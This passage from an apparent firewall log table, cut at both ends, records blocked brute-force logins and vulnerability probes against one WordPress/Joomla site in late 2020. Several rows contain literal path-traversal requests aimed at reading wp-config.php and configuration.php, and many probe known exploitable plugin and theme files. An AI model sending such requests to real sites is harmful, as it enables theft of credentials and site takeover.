17:30:14','137.117.102.110','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2611,'2020-11-08 23:34:08','115.84.92.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(2612,'2020-11-08 23:34:18','115.84.92.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(2613,'2020-11-08 23:34:29','115.84.92.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(2614,'2020-11-09 00:18:48','91.211.20.65','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2615,'2020-11-09 05:56:30','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php','404shield',''),(2616,'2020-11-09 14:41:22','198.27.67.87','https://smithandsmith.co.za/wp-login.php','404shield',''),(2617,'2020-11-09 14:41:22','198.27.67.87','https://smithandsmith.co.za/wp-login.php','404shield',''),(2618,'2020-11-09 23:24:36','104.210.214.37','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2619,'2020-11-09 23:24:47','104.210.214.37','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2620,'2020-11-09 23:25:20','104.210.214.37','https://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2621,'2020-11-10 00:49:57','104.210.214.37','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2622,'2020-11-10 01:00:53','104.210.214.37','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2623,'2020-11-10 01:32:03','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/Nuance/functions/jwpanel/scripts/valums_uploader/php.php','404shield',''),(2624,'2020-11-10 16:20:43','186.234.80.35','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2625,'2020-11-11 07:31:14','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2626,'2020-11-11 07:31:14','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2627,'2020-11-11 09:01:25','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2628,'2020-11-11 09:01:28','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2629,'2020-11-11 14:37:55','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php','404shield',''),(2630,'2020-11-12 01:42:48','202.137.155.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2631,'2020-11-12 01:43:27','202.137.155.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2632,'2020-11-12 01:43:49','202.137.155.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2633,'2020-11-12 06:22:30','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2634,'2020-11-12 06:22:35','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2635,'2020-11-12 06:22:39','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2636,'2020-11-12 10:00:47','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/switchblade-v1.3/framework/_scripts/valums_uploader/php.php','404shield',''),(2637,'2020-11-12 21:49:12','194.184.98.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(2638,'2020-11-12 21:49:17','194.184.98.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(2639,'2020-11-12 21:49:21','194.184.98.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(2640,'2020-11-13 00:52:18','31.211.67.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2641,'2020-11-13 00:52:22','31.211.67.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2642,'2020-11-13 00:52:28','31.211.67.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2643,'2020-11-13 03:54:44','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/skinizer/framework/_scripts/valums_uploader/php.php','404shield',''),(2644,'2020-11-13 08:49:57','112.175.232.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(2645,'2020-11-13 08:50:03','112.175.232.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(2646,'2020-11-13 08:50:10','112.175.232.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(2647,'2020-11-13 16:00:29','93.114.184.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(2648,'2020-11-13 17:49:43','103.1.93.165','https://smithandsmith.co.za/wp-login.php','404shield',''),(2649,'2020-11-13 17:49:57','103.1.93.165','https://smithandsmith.co.za/wp-login.php','404shield',''),(2650,'2020-11-13 17:50:09','103.1.93.165','https://smithandsmith.co.za/wp-login.php','404shield',''),(2651,'2020-11-14 00:45:51','202.137.155.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(2652,'2020-11-14 00:46:17','202.137.155.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(2653,'2020-11-14 00:46:38','202.137.155.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(2654,'2020-11-14 10:28:35','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php','404shield',''),(2655,'2020-11-14 21:34:51','104.210.214.37','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2656,'2020-11-14 21:35:13','104.210.214.37','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2657,'2020-11-14 22:14:44','45.147.197.216','http://smithandsmith.co.za/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php','dfishield',''),(2658,'2020-11-14 22:14:51','45.147.197.216','http://smithandsmith.co.za/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=../../../../configuration.php&order=name&srt=yes','dfishield',''),(2659,'2020-11-14 22:14:52','45.147.197.216','http://smithandsmith.co.za/plugins/content/fsave/download.php?filename=../../../configuration.php','dfishield',''),(2660,'2020-11-14 23:54:51','104.210.214.37','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2661,'2020-11-14 23:54:55','104.210.214.37','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2662,'2020-11-14 23:55:05','104.210.214.37','https://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2663,'2020-11-15 05:53:25','134.122.78.89','https://smithandsmith.co.za/wp-login.php','404shield',''),(2664,'2020-11-15 05:53:25','134.122.78.89','https://smithandsmith.co.za/wp-login.php','404shield',''),(2665,'2020-11-15 07:40:02','104.214.79.46','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2666,'2020-11-15 12:39:09','115.84.91.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(2667,'2020-11-15 12:39:15','115.84.91.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(2668,'2020-11-15 12:39:20','115.84.91.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(2669,'2020-11-16 05:55:13','5.130.72.125','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2670,'2020-11-16 06:30:09','5.62.43.167','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php?test=hello','404shield',''),(2671,'2020-11-16 06:30:28','5.62.43.167','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php.suspected?test=hello','404shield',''),(2672,'2020-11-16 17:06:50','46.101.132.88','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2673,'2020-11-16 19:41:44','46.101.156.213','https://smithandsmith.co.za/wp-login.php','404shield',''),(2674,'2020-11-16 23:03:07','176.8.91.58','https://smithandsmith.co.za/wp-login.php','404shield',''),(2675,'2020-11-17 08:31:11','91.122.198.128','https://smithandsmith.co.za/wp-login.php','404shield',''),(2676,'2020-11-17 08:31:29','91.122.198.128','https://smithandsmith.co.za/wp-login.php','404shield',''),(2677,'2020-11-17 08:31:43','91.122.198.128','https://smithandsmith.co.za/wp-login.php','404shield',''),(2678,'2020-11-18 01:50:32','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/photocrati-theme/admin/scripts/scripts-update.php','404shield',''),(2679,'2020-11-18 03:17:02','128.199.115.160','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2680,'2020-11-18 04:29:37','107.180.227.163','https://smithandsmith.co.za/wp-login.php','404shield',''),(2681,'2020-11-18 19:17:32','104.214.79.46','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2682,'2020-11-19 04:09:47','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/photocrati-theme-v4.07/admin/scripts/scripts-update.php','404shield',''),(2683,'2020-11-19 08:35:36','207.180.239.227','https://smithandsmith.co.za/wp-login.php','404shield',''),(2684,'2020-11-20 00:43:52','119.29.155.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2685,'2020-11-20 08:39:58','69.163.146.251','https://smithandsmith.co.za/wp-login.php','404shield',''),(2686,'2020-11-20 18:47:18','188.163.89.108','http://smithandsmith.co.za/administrator/','adminpw',''),(2687,'2020-11-21 13:18:05','31.36.100.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2688,'2020-11-21 13:18:08','31.36.100.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2689,'2020-11-21 13:18:10','31.36.100.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2690,'2020-11-21 22:36:25','104.43.245.228','http://smithandsmith.co.za//administrator/index.php','adminpw',''),(2691,'2020-11-21 22:36:29','104.43.245.228','https://smithandsmith.co.za//wp-login.php','404shield',''),(2692,'2020-11-21 22:36:31','104.43.245.228','http://smithandsmith.co.za//administrator/index.php','adminpw',''),(2693,'2020-11-22 00:34:29','104.43.245.228','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(2694,'2020-11-22 00:34:33','104.43.245.228','https://www.smithandsmith.co.za//wp-login.php','404shield',''),(2695,'2020-11-22 00:34:36','104.43.245.228','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(2696,'2020-11-22 11:34:54','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/photocrati-theme-v4/admin/scripts/scripts-update.php','404shield',''),(2697,'2020-11-22 12:46:07','185.239.242.228','https://smithandsmith.co.za/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2698,'2020-11-22 12:46:08','185.239.242.228','https://smithandsmith.co.za/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2699,'2020-11-22 12:46:24','185.239.242.228','https://smithandsmith.co.za/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2700,'2020-11-22 21:14:03','91.211.20.65','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2701,'2020-11-22 22:20:28','5.188.84.19','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php','404shield',''),(2702,'2020-11-22 22:20:30','5.188.84.19','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php','404shield',''),(2703,'2020-11-23 04:44:48','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/photocrati/admin/scripts/scripts-update.php','404shield',''),(2704,'2020-11-23 05:01:06','167.172.56.36','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2705,'2020-11-24 02:17:07','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/GeoPlaces/style.css','404shield',''),(2706,'2020-11-24 10:17:51','115.84.99.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(2707,'2020-11-24 10:18:17','115.84.99.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(2708,'2020-11-24 10:18:47','115.84.99.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(2709,'2020-11-24 18:42:00','185.239.242.228','https://smithandsmith.co.za/wp-content/plugins/affinipay-payment-gateway/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2710,'2020-11-24 18:42:07','185.239.242.228','https://smithandsmith.co.za/wp-content/plugins/aspose-pdf-importer/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2711,'2020-11-24 18:42:13','185.239.242.228','https://smithandsmith.co.za/wp-content/plugins/badgeup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2712,'2020-11-24 19:54:36','5.188.84.19','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php','404shield',''),(2713,'2020-11-24 19:54:37','5.188.84.19','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php','404shield',''),(2714,'2020-11-24 20:28:52','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2715,'2020-11-24 20:28:58','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2716,'2020-11-24 20:29:04','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2717,'2020-11-24 20:52:04','202.137.155.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(2718,'2020-11-24 20:52:24','202.137.155.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(2719,'2020-11-24 20:52:42','202.137.155.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(2720,'2020-11-24 22:58:00','5.188.84.19','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php','404shield',''),(2721,'2020-11-24 22:58:05','5.188.84.19','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php','404shield',''),(2722,'2020-11-25 00:20:12','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(2723,'2020-11-25 01:45:09','115.84.92.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(2724,'2020-11-25 01:45:31','115.84.92.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(2725,'2020-11-25 01:45:54','115.84.92.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(2726,'2020-11-25 04:28:21','185.239.242.228','https://www.smithandsmith.co.za/wp-content/plugins/affinipay-payment-gateway/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2727,'2020-11-25 04:28:24','185.239.242.228','https://www.smithandsmith.co.za/wp-content/plugins/aspose-pdf-importer/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2728,'2020-11-25 04:28:29','185.239.242.228','https://www.smithandsmith.co.za/wp-content/plugins/badgeup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2729,'2020-11-25 07:49:45','159.242.227.26','https://smithandsmith.co.za/wp-content/plugins/apikey/josmtpapi.php.suspected?test=hello','404shield',''),(2730,'2020-11-25 07:49:45','159.242.227.26','https://smithandsmith.co.za/wp-content/plugins/apikey/josmtpapi.php?test=hello','404shield',''),(2731,'2020-11-25 07:49:46','159.242.227.26','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php?test=hello','404shield',''),(2732,'2020-11-25 10:53:12','159.242.227.26','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2733,'2020-11-25 10:53:14','159.242.227.26','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2734,'2020-11-25 10:53:15','159.242.227.26','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2735,'2020-11-25 11:10:25','188.163.89.73','http://smithandsmith.co.za/administrator/','adminpw',''),(2736,'2020-11-26 02:00:17','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/WPLocalPlaces/style.css','404shield',''),(2737,'2020-11-26 14:19:21','139.99.196.183','https://smithandsmith.co.za/wp-login.php','404shield',''),(2738,'2020-11-27 08:44:57','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(2739,'2020-11-27 08:44:57','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(2740,'2020-11-27 09:58:02','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(2741,'2020-11-27 10:52:50','95.153.112.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(2742,'2020-11-27 10:52:53','95.153.112.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(2743,'2020-11-27 10:52:56','95.153.112.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(2744,'2020-11-28 02:30:57','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/DailyDeal/style.css','404shield',''),(2745,'2020-11-28 05:23:09','159.89.2.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2746,'2020-11-28 07:33:11','176.113.228.24','https://smithandsmith.co.za/wp-login.php','404shield',''),(2747,'2020-11-28 07:33:33','176.113.228.24','https://smithandsmith.co.za/wp-login.php','404shield',''),(2748,'2020-11-28 07:33:41','176.113.228.24','https://smithandsmith.co.za/wp-login.php','404shield',''),(2749,'2020-11-28 16:25:41','129.213.138.117','http://smithandsmith.co.za//?gf_page=upload','dfishield',''),(2750,'2020-11-28 16:25:43','129.213.138.117','https://smithandsmith.co.za//wp-content/_input_3_RxR.phtml','404shield',''),(2751,'2020-11-28 16:25:44','129.213.138.117','https://smithandsmith.co.za//wp-admin/admin-ajax.php','404shield',''),(2752,'2020-11-29 02:37:11','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(2753,'2020-11-29 07:56:14','187.190.227.120','https://smithandsmith.co.za/wp-login.php','404shield',''),(2754,'2020-11-29 07:56:38','187.190.227.120','https://smithandsmith.co.za/wp-login.php','404shield',''),(2755,'2020-11-29 07:56:49','187.190.227.120','https://smithandsmith.co.za/wp-login.php','404shield',''),(2756,'2020-11-29 08:42:25','192.99.39.157','https://smithandsmith.co.za/wp-login.php','404shield',''),(2757,'2020-11-29 19:48:01','113.160.54.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(2758,'2020-11-29 19:48:01','113.160.54.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(2759,'2020-11-30 01:54:41','5.130.72.125','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2760,'2020-11-30 02:46:45','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2761,'2020-12-01 10:29:55','52.242.79.125','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2762,'2020-12-01 12:54:57','213.252.188.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(2763,'2020-12-01 15:20:58','52.242.79.125','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2764,'2020-12-02 14:59:34','95.216.222.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(2765,'2020-12-03 02:09:28','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/k_administrator/assets/php/connector.minimal.php','404shield',''),(2766,'2020-12-03 14:29:33','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/MoneyTheme/uploads/upload.php','404shield',''),(2767,'2020-12-03 19:48:16','192.99.31.122','https://smithandsmith.co.za/wp-login.php','404shield',''),(2768,'2020-12-03 20:39:58','77.245.124.70','https://www.smithandsmith.co.za/wp-content/plugins/duplicator/readme.txt','404shield',''),(2769,'2020-12-03 21:17:50','20.64.179.85','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2770,'2020-12-04 08:24:06','51.38.41.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(2771,'2020-12-04 08:51:38','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/theagency/includes/uploadify/uploadify.css','404shield',''),(2772,'2020-12-04 18:43:11','77.245.124.70','https://www.smithandsmith.co.za/wp-content/plugins/duplicator/readme.txt','404shield',''),(2773,'2020-12-04 19:26:24','54.37.198.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(2774,'2020-12-04 19:26:24','54.37.198.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(2775,'2020-12-05 01:31:22','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/file-manager-advanced/php/connector.minimal.php','404shield',''),(2776,'2020-12-05 10:20:54','186.46.40.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2777,'2020-12-05 10:21:20','186.46.40.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2778,'2020-12-05 10:21:39','186.46.40.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2779,'2020-12-05 15:16:00','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/file-manager/elFinder/php/connector.minimal.php','404shield',''),(2780,'2020-12-06 01:14:29','194.184.98.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(2781,'2020-12-06 01:14:43','194.184.98.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(2782,'2020-12-06 01:14:51','194.184.98.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(2783,'2020-12-06 02:51:25','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','404shield',''),(2784,'2020-12-06 18:51:39','111.89.169.113','https://smithandsmith.co.za/wp-login.php','404shield',''),(2785,'2020-12-07 01:43:53','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/elemin/themify/js/utils.js','404shield',''),(2786,'2020-12-07 08:04:33','95.174.110.235','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2787,'2020-12-07 13:07:02','40.117.233.252','https://smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2788,'2020-12-07 16:23:36','95.54.73.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(2789,'2020-12-07 16:23:59','95.54.73.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(2790,'2020-12-07 16:24:19','95.54.73.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(2791,'2020-12-07 16:27:39','78.85.233.68','https://www.smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/css/super-logo-showcase.css','404shield',''),(2792,'2020-12-08 01:34:19','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/suco/themify/js/utils.js','404shield',''),(2793,'2020-12-08 09:01:50','40.117.233.252','https://www.smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2794,'2020-12-08 09:01:56','91.185.67.9','https://www.smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2795,'2020-12-08 14:45:08','78.85.233.68','https://www.smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/css/super-logo-showcase.css','404shield',''),(2796,'2020-12-08 22:10:47','18.232.61.117','http://www.smithandsmith.co.za/','muashield',''),(2797,'2020-12-08 22:10:47','18.232.61.117','http://www.smithandsmith.co.za/','muashield',''),(2798,'2020-12-08 22:10:57','18.232.61.117','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(2799,'2020-12-09 03:48:35','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php','404shield',''),(2800,'2020-12-09 18:04:25','206.189.54.104','https://smithandsmith.co.za/wp-admin/install.php?step=1','404shield',''),(2801,'2020-12-09 19:00:46','62.210.185.4','https://smithandsmith.co.za/wp-login.php','404shield',''),(2802,'2020-12-10 06:05:35','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php','404shield',''),(2803,'2020-12-10 08:08:06','66.85.30.117','https://smithandsmith.co.za/wp-login.php','404shield',''),(2804,'2020-12-10 20:24:27','85.140.84.77','https://www.smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2805,'2020-12-11 03:56:22','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','404shield',''),(2806,'2020-12-11 04:20:37','93.170.124.208','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2807,'2020-12-12 09:42:27','85.140.71.63','https://www.smithandsmith.co.za/wp-content/plugins/angwp/UPDATES.txt','404shield',''),(2808,'2020-12-12 13:27:13','94.182.181.178','https://smithandsmith.co.za/wp-login.php','404shield',''),(2809,'2020-12-12 13:27:13','94.182.181.178','https://smithandsmith.co.za/wp-login.php','404shield',''),(2810,'2020-12-12 15:16:40','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2811,'2020-12-12 18:13:59','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2812,'2020-12-12 18:14:03','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2813,'2020-12-12 18:14:07','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(2814,'2020-12-12 20:16:02','46.150.254.81','https://smithandsmith.co.za/wp-login.php','404shield',''),(2815,'2020-12-12 20:16:04','46.150.254.81','https://smithandsmith.co.za/administrator/','adminpw',''),(2816,'2020-12-13 01:38:52','104.244.76.13','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php','404shield',''),(2817,'2020-12-13 09:56:08','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php','404shield',''),(2818,'2020-12-13 11:59:43','52.163.223.126','https://smithandsmith.co.za/wp-login.php','404shield',''),(2819,'2020-12-14 01:28:15','77.220.48.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(2820,'2020-12-14 01:28:19','77.220.48.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(2821,'2020-12-14 01:28:22','77.220.48.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(2822,'2020-12-14 02:00:46','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.css','404shield',''),(2823,'2020-12-14 06:21:56','193.254.37.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(2824,'2020-12-14 06:21:59','193.254.37.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(2825,'2020-12-14 06:22:02','193.254.37.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(2826,'2020-12-14 13:13:29','186.46.40.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2827,'2020-12-14 13:13:41','186.46.40.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2828,'2020-12-14 13:13:58','186.46.40.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2829,'2020-12-14 14:37:37','202.137.155.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2830,'2020-12-14 14:37:47','202.137.155.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2831,'2020-12-14 14:37:54','202.137.155.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(2832,'2020-12-14 17:55:57','78.85.181.1','https://www.smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/css/mega-superstorefinder.css','404shield',''),(2833,'2020-12-14 20:20:04','115.84.92.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(2834,'2020-12-14 20:20:14','115.84.92.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(2835,'2020-12-14 20:20:21','115.84.92.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(2836,'2020-12-15 03:47:02','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/purevision/scripts/admin/uploadify/pomo.php','404shield',''),(2837,'2020-12-15 07:18:46','92.100.159.218','https://smithandsmith.co.za/wp-login.php','404shield',''),(2838,'2020-12-15 07:18:50','92.100.159.218','https://smithandsmith.co.za/wp-login.php','404shield',''),(2839,'2020-12-15 07:18:53','92.100.159.218','https://smithandsmith.co.za/wp-login.php','404shield',''),(2840,'2020-12-15 21:07:33','178.159.37.134','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php','404shield',''),(2841,'2020-12-15 21:07:43','178.159.37.134','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php','404shield',''),(2842,'2020-12-15 21:07:49','178.159.37.134','http://www.smithandsmith.co.za/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=%2F&item=wp-config.php&order=name&srt=yes','dfishield',''),(2843,'2020-12-16 02:16:33','77.245.123.56','https://www.smithandsmith.co.za/wp-content/plugins/angwp/UPDATES.txt','404shield',''),(2844,'2020-12-16 02:59:01','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css','404shield',''),(2845,'2020-12-16 08:42:52','132.248.65.245','https://smithandsmith.co.za/wp-login.php','404shield',''),(2846,'2020-12-16 11:17:23','193.106.229.186','https://smithandsmith.co.za/wp-login.php','404shield',''),(2847,'2020-12-16 11:17:36','193.106.229.186','https://smithandsmith.co.za/wp-login.php','404shield',''),(2848,'2020-12-16 11:17:44','193.106.229.186','https://smithandsmith.co.za/wp-login.php','404shield',''),(2849,'2020-12-16 18:30:23','5.130.72.125','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2850,'2020-12-16 23:41:55','194.61.24.94','https://smithandsmith.co.za/wp-content/plugins/boldgrid-backup/cron/restore-info.json','404shield',''),(2851,'2020-12-17 04:30:00','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/Brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css','404shield',''),(2852,'2020-12-17 